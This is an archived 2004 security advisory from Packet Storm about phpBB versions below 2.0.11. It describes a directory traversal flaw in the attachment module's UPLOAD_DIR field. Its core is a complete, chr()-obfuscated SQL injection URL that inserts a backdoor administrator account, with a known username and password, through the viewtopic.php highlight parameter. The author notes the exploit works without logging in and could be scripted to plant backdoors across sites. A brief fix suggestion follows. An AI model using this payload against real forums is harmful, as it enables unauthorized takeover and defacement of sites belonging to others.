exploit the possibilities

phpbb2011.txt

phpbb2011.txt
Posted Dec 11, 2004
Authored by Zeelock

phpBB versions below 2.0.11 suffer from addition SQL injection and directory traversal flaws.

tags | exploit, sql injection
MD5 | 3db6cdf08707e750aade88f2b48d5986

phpbb2011.txt

Change Mirror Download
Phpbb: All vulnerable all except 2.0.11
Attachment module: All version vulnerable

Howdark update opened wide my eyes with his nice exploit:

Bugtraq id: 10701

-----
viewtopic.php?t=1&highlight=%2527
-----

Looking at the code I saw that was possible inject any type of Sql query
with a multiple char() functions.

The following code can add an username with admin rights executing this
query:

INSERT INTO
phpbb_users(user_id,user_active,username,user_password,user_level) VALUES
('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1')

And will be added to phpbb_users a new user with admin rights.

*Note we can only execute a working query if we know the tables name. If not
we can't. So this work only with a standard installation (usually 95% of
websites ;-)

username: ze3lock
pass: thepass

The exploit can be run without being logged in and then you can have access
with username. So it's quite simple to make it part of a script that could
make backdoors around the web.

For make it working just use the id of a working thread (in this case the
thread is 30 - you can see it from the message)

--- Code start ----

http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr
(73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)
%252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%25
2echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252
echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%25
2echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%2
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%2
52echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%2
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%
252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%
252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)%
252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44)
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108
)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32
)%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%25
2echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252ech
r(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39
)%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108)
%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%2
52echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252ec
hr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr
(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98
)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%25
2echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252ec
hr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(
41))%252e%2527

--- code end ---

------------ Attach Module ----------------


In the attach module, I found a directory traversal in the "UPLOAD_DIR"
field.

This is the directory where all attachments are supposted to be uploaded.

The field accept any kind of character so you can put instead of 'files'
'../../' and all the attachments will be uploaded in the '../..? directory.

That's really dangerous for defacements threat.


--------------- Suggestion ------------------

Please, upgrade to version 2.0.11 and add an input validation to UPLOAD_DIR
field in attach module.

Zeelock

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    6 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close